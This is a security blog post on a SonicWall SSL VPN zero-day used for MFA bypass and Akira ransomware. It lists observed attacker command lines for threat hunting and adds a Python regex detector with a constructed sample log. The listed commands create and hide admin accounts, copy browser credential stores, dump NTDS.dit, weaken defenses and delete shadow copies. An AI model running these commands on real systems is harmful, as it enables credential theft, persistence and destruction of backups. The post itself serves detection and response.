SonicWall VPN Zero-Day Exploited: Attackers Bypass MFA and Deploy Ransomware

A critical zero-day in SonicWall SSL VPNs is enabling rapid domain-wide ransomware attacks—even against networks with MFA. Here’s what’s happening, how attackers operate, and what urgent steps you should take.

Saiprashanth Pulisetti

8/5/2025 · 2 min read

The Threat: Fast, Sophisticated, Ongoing

Security teams, including Huntress, are witnessing a wave of intrusions leveraging a likely SonicWall zero-day. Attackers are reliably bypassing MFA and, within hours, moving laterally to compromise domain controllers and launch ransomware. These attacks are targeting SonicWall TZ and NSa-series appliances with SSLVPN enabled and running firmware versions 7.2.0-7015 or earlier.

The Attack Chain: From Appliance Breach to Ransomware

After exploiting the SonicWall device—even with MFA—the attackers:

  • Abuse over-privileged accounts (e.g., sonicwall, LDAPAdmin)

  • Deploy backdoors like Cloudflared tunnels, OpenSSH, and remote management tools (AnyDesk, ScreenConnect)

  • Move laterally through PowerShell Remoting, WMI, and tooling

  • Steal credentials—dumping Veeam, Active Directory data

  • Disable defenses—turning off Windows Defender, firewall, and erasing recovery backups

  • Deploy ransomware (Akira), causing enterprise-wide disruption

Real-World Commands: What Attackers Are Running

Here’s a selection of the tools, tactics, and actual command lines observed in these attacks. Security teams should search endpoints and logs for these patterns:

Enumeration and Reconnaissance

"C:\Users\[redacted]\Downloads\Advanced_IP_Scanner_2.5.4594.1.exe"
"C:\[redacted]\netscan\netscan.exe"
"C:\Windows\system32\nltest.exe" /trusted_domains
"C:\Windows\system32\PING.EXE" 192.168.xx.xxx
"C:\Windows\system32\nltest.exe" /dclist:
"C:\Users\[redacted]\Documents\Advanced_Port_Scanner_2.5.3869.exe"
Install-WindowsFeature RSAT-AD-PowerShell
Get-ADComputer -Filter -Property | Select-Object Enabled, DNSHostName, IPv4Address, OperatingSystem, Description > C:\programdata\[redacted].txt
cmd.exe /Q /c nltest /domain_trusts 1> \\Windows\\Temp\\ysKBfL 2>&1
cmd.exe /Q /c quser 1> \\127.0.0.1\ADMIN$\__1754125023.3698354 2>&1
net group "Domain admins" /domain

Staging, Exfiltration, and Tool Usage

"C:\Program Files\WinRAR\WinRAR.exe" a -ep1 -scul -r0 -iext -imon1 -- . X:\[Redacted]
C:\ProgramData\shares.txt
"C:\Program Files\FileZilla FTP Client\fzsftp.exe" -v

Persistence and Privilege Escalation

"C:\Windows\System32\msiexec.exe" /i "C:\ProgramData\OpenSSHa.msi"
"C:\Windows\system32\net.exe" user lockadmin Msnc?42da /add
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /t REG_DWORD /v commuser /d 0 /f
net user [REDACTED] VRT83g$%ce /add
net localgroup Administrators [redacted] /add
net localgroup "Remote Desktop Users" [redacted] /add
net group "Domain Admins" azuresync /add
cmd.exe /Q /c net user backupSQL Password123$ /add /dom 1> \\Windows\\Temp\\tinhLg 2>&1
cmd.exe /Q /c net group "Domain Admins" backupSQL /dom /add 1> \Windows\Temp\NDqyOI 2>&1

Credential Theft and Lateral Movement

cmd.exe /Q /c copy "C:\Users\[redacted]\AppData\Local\Microsoft\Edge\User Data\Default\Login Data" "C:\Windows\Temp\1753954887.8450267"
"C:\Windows\system32\wbadmin.exe" start backup -backupTarget:\\localhost\c$\ProgramData\ -include:C:\Windows\NTDS\NTDS.dit C:\Windows\System32\config\SYSTEM C:\Windows\System32\config\SECURITY -quiet

Evasion and Security Disabling

"C:\Windows\system32\SystemSettingsAdminFlows.exe" Defender DisableEnhancedNotifications 1
netsh advfirewall firewall add rule name="allow RemoteDesktop" dir=in protocol=TCP localport=3389 action=allow
New-NetFirewallRule -Name sshd -DisplayName 'OpenSSH Server (sshd)' -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 22

Recovery Prevention and Ransomware Execution

"C:\WINDOWS\system32\vssadmin.exe" delete shadows /all /quiet
w.exe -p=\\[redacted]\C$ -n=1

What You Should Do Right Now

  • Disable SonicWall SSL VPN immediately if possible

  • If you can’t, restrict access by IP allow-list and segment critical systems

  • Audit service accounts—especially those used by SonicWall devices; remove excessive privileges

  • Hunt for these command lines and processes in your logs, EDR, and SIEM tools

  • Review for attacker-created accounts like lockadmin, backupSQL, and suspicious new administrative groups
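To make the hunting and account-review steps above concrete, here is an added example (not from the original post or the Huntress write-up) that turns the observed command lines into regex rules and runs them over process-creation command lines such as the CommandLine field of Sysmon Event ID 1 or Security event 4688. The sample log lines are constructed, with two benign entries to show they are not flagged.

```python
import re

# Detection rules derived from the observed command lines in this post.
# Each rule: (attack-chain stage, description, regex applied to a process command line).
RULES = [
    ("Enumeration", "nltest domain/DC enumeration",
     re.compile(r'nltest(?:\.exe)?"?\s+/(?:domain_trusts|dclist|trusted_domains)', re.I)),
    ("Persistence", "account creation with net user /add",
     re.compile(r'net(?:\.exe)?"?\s+user\s+(\S+)\s+\S+\s+/add', re.I)),
    ("Persistence", "account added to Domain Admins",
     re.compile(r'net(?:\.exe)?"?\s+group\s+"domain admins"\s+(\S+)\s+(?:/dom(?:ain)?\s+)?/add', re.I)),
    ("Persistence", "account hidden via Winlogon SpecialAccounts\\UserList",
     re.compile(r'reg(?:\.exe)?"?\s+add\s+".*SpecialAccounts\\UserList"', re.I)),
    ("Credential theft", "NTDS.dit backed up with wbadmin",
     re.compile(r'wbadmin(?:\.exe)?"?\s+start\s+backup.*NTDS\.dit', re.I)),
    ("Evasion", "inbound firewall rule for RDP (3389) or SSH (22)",
     re.compile(r'netsh\s+advfirewall.*localport=(?:3389|22)\b|New-NetFirewallRule.*-LocalPort\s+(?:3389|22)\b', re.I)),
    ("Recovery prevention", "shadow copy deletion",
     re.compile(r'vssadmin(?:\.exe)?"?\s+delete\s+shadows', re.I)),
]

def hunt(command_lines):
    """Return (stage, description, command_line) for every rule hit, preserving log order."""
    hits = []
    for line in command_lines:
        for stage, desc, rx in RULES:
            if rx.search(line):
                hits.append((stage, desc, line))
    return hits

def created_accounts(command_lines):
    """Account names passed to 'net user <name> <password> /add', for the account review step."""
    rx = RULES[1][2]
    return sorted({m.group(1) for line in command_lines for m in [rx.search(line)] if m})

# Constructed sample: CommandLine fields as exported from Sysmon Event ID 1 / Security 4688.
# Not taken from a real incident; the svchost and WINWORD lines are benign controls.
SAMPLE_LOG = [
    r'"C:\Windows\system32\svchost.exe" -k netsvcs -p',
    r'"C:\Windows\system32\nltest.exe" /dclist:',
    r'cmd.exe /Q /c net user backupSQL [redacted] /add /dom 1> \Windows\Temp\tinhLg 2>&1',
    r'"C:\Windows\system32\net.exe" user lockadmin [redacted] /add',
    r'cmd.exe /Q /c net group "Domain Admins" backupSQL /dom /add',
    r'"C:\Windows\system32\wbadmin.exe" start backup -backupTarget:\\localhost\c$\ProgramData\ -include:C:\Windows\NTDS\NTDS.dit -quiet',
    r'netsh advfirewall firewall add rule name="allow RemoteDesktop" dir=in protocol=TCP localport=3389 action=allow',
    r'"C:\WINDOWS\system32\vssadmin.exe" delete shadows /all /quiet',
    r'"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n',
]

if __name__ == "__main__":
    for stage, desc, line in hunt(SAMPLE_LOG):
        print(f"[{stage}] {desc}: {line}")
    print("accounts created:", created_accounts(SAMPLE_LOG))
```

Feed it the exported CommandLine column from your EDR or SIEM instead of SAMPLE_LOG; any hit in the Persistence or Credential theft stages on a host that is not a known admin workstation deserves immediate triage.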

See the full technical write-up and complete investigation here:
https://www.huntress.com/blog/exploitation-of-sonicwall-vpn?utm_source=linkedin&utm_medium=social&utm_campaign=cy25-08-rr-multi-global-broad-all-sonicwall_vpn

Stay vigilant. Time is of the essence when these attacks land—and every minute counts.

For all details, IOCs, and updated incident response techniques, see: Active Exploitation of SonicWall VPNs | Huntress